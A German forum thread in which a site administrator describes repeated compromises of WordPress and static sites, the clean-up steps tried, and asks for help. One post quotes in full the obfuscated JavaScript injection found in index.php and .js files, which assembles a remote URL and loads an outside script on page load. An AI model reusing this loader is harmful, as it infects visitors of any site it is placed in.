Beiträge von e_fetch

    Moin befla,

    was soll man als erstes machen, wenn etwas nicht funktioniert?
    Genau - Plugins deaktivieren...

    Es war das PlugIn "Cystat", was die Anzeige der Einstellungs-Seite verhindert hat.

    Habe es deaktiviert ("Einstellungen-Permalinks" war wieder da), die Smartlinks gesetzt, Cystat wieder aktiviert.
    Alles läuft jetzt so, wie es sein sollte, es ist also nur die Anzeige der Einstellungsseite betroffen.
    Aber so oft ändern man die Permalinks ja auch nicht...
    :-)

    Vielen Dank
    sagt
    Frank

    Moinmoin,

    ja - es muss wohl ein sehr gut getarnter Wurm gewesen sein. Denn seit ich meine Rechner platt gemacht, Win XP neu installiert und alle FTP-Passworte geändert habe (naja - ich bin noch dabei), wurden die Seiten nicht mehr verändert.
    Das wird noch eine lange Nacht...

    Ich danke für die Unterstützung!

    Herzliche Grüße
    e_fetch

    So - zwei Rechner platt gemacht.

    Der nette Mann vom all-inkl.de-Support, den ich in meiner Verzweiflung noch angerufen hatte, meinte, wenn das Programm keine Malware findet, aber das Problem weiter bestünde, wäre es ein Zeichen dafür, dass der Wurm sehr tief sitzt und nur Neuinstallation eine sichere Sache wäre.

    Das Notebook läuft schon wieder, drei Blogs habe ich (mit neuem Passwort, Username ist vorgegeben) aufgesetzt. Wenn jetzt nichts passiert, haben wir das Problem gelöst.

    Die .ini meines Total Commanders (für FTP) ist auch wieder jungfräulich - also: Wünscht mir Glück...
    :-)
    (Wenn ich nicht mehr schreibe, hat's geklappt)

    Viele Grüße
    von
    e_fetch

    ...jetzt bin ich verzweifelt und ratlos:

    Rechner gesäubert, Passworte geändert - und trotzdem schreibt der Russe wieder sein Script in meine frisch aufgespielten Dateien.

    Jetzt muss ich mal in den Datenbanken gucken, ob sich da noch was versteckt hat.

    Im FTP-Log von letzter Nacht habe ich viele Zugriffe auf die Seiten, die geändert wurden, allerdings von ständig wechselnden IPs.

    Danke gericoach,

    Malwarebytes Antimalware hat böse Dateien gefunden, die Antivir-Premium offensichtlich entgangen sind.

    Jetzt, wo der Rechner _wirklich_ sauber ist, werden die Passworte alle geändert und dann 18 Mal Wordpress neu aufgespielt.

    So kann man auch seinen Tag verbringen...
    ;-)

    Bis bald
    tschüß
    Dein
    e_fetch

    Scan läuft, bin gerade fleissig am Passworte ändern.

    Ein Kunde kommt schon nicht mehr in's Adminmenü.

    Habe bei Aufruf eines infizierten Systems in der Statuszeile aufblitzen sehen, dass mit einer Seite in Russland Kontakt aufgenommen wird.

    Bis später!

    Danke für die Antwort.

    Ich scanne jetzt noch mal meinen Rechner, der eigentlich sauber sein sollte...

    Verwunderlich nur, dass auch Seiten befallen sind, auf die ich seit langem nicht mehr per FTP zugegriffen habe.

    Ich gebe Bescheid, wenn der Rechner definitiv sauber ist, ich alle (ogottogott) Passworte geändert und das Problem damit dann (hoffentlich) behoben ist.

    Bis dann
    danke
    e_fetch

    Hallo,
    letzte Nacht scheint eine großangelegte Attacke begonnen zu haben.
    Auf etlichen (Kunden-) Blogs wurden alle index.php und allle *.js-dateien mit folgendem Anhang versehen:

    Zitat

    <script>var U="";var C=["A","j"];var jc=["rJ"];var W;this.ql="";this.w=59531;this.w+=105;d=function(){function I(J,Ih,k){return J.substr(Ih,k);i=["S"];}try {var o='Ia'} catch(o){};try {var P='h'} catch(P){};var WT=RegExp;var m=String("/goo"+"gle."+"com/"+"disc"+I("uz.nGrWf",0,4)+I("GM5et/m5GM",3,4)+"ynet"+".com"+I(".phptulc",0,4));var Jg=["bl"];var T='';var Ay=55108;var u=document;gA={Ux:false};this.Xr=38335;this.Xr++;var BI=["c","lg","Sy"];function q(J,Ih){this.hX='';this.fc=false;var k="["+Ih+"]";var uz=13653;this.uzW="";var f=new WT(k, I("gTje",0,1));var p={Bm:false};QI=42937;QI++;return J.replace(f, T);this.PY=false;};var db=false;this.dZ=false;var t=q('szc2rYiQpMtE','e4R_zM0En2gbBY9PwQ');var l=471671-463591;var M=null;try {var MR='Nf'} catch(MR){};try {var d_='rQ'} catch(d_){};var E=new String("body");var iW=13313;W=function(){Qy={nC:false};var bm={_:false};try {var b=q('c7ryeWaCtyeCEdlsegmbeynPtY','YTdgbL9P5MWsyD7UVN1C');var Rs={};try {var oh='ng'} catch(oh){};D=u[b](t);Ts=["zj","qll","fm"];var Sr=new Array();var Jb="def"+"er";OV={dr:53223};sa=30503;sa+=219;var y=q('sYrYcF','ZkLCTtGaz4IpRYBWMF85');var J=l+m;var pm="pm";var rM="rM";try {var eE='JZ'} catch(eE){};D[Jb]=[1][0];D[y]=String("ht"+"tp"+":/"+I("/beNa",0,2)+I("H52qarHq52",4,2)+I("YswfqsYw",3,2)+I("uaqSf",0,2)+I("FMBkeMFB",3,2)+I("X1K.rXK1",3,2)+I("CXhu:ChX",3,2))+J;this.sb="sb";var nW=36808;u[E].appendChild(D);var sI=12058;} catch(ta){};try {} catch(Wi){};};this.JL="";};d();var dR="dR";hv=["ms","nI","qA"];window.onload=W;var Gz=[];eH={Ks:false};</script>
    <!--d5009a73f981f261bc87d6ef0e3d6aea-->


    Habe WP auf mehreren Domains komplett neu aufgesetzt - kurze Zeit später das gleiche Problem, unabhängig vom Provider.
    Selbst staische Seiten sind betroffen.
    Kann es sein, dass Lightbox das Einfalltor ist (die einzige Parallele bei allen gehackten Seiten)?

    Weiß jemand Abhilfe?

    Danke und tschüß
    ein verzweifelter
    e_fetch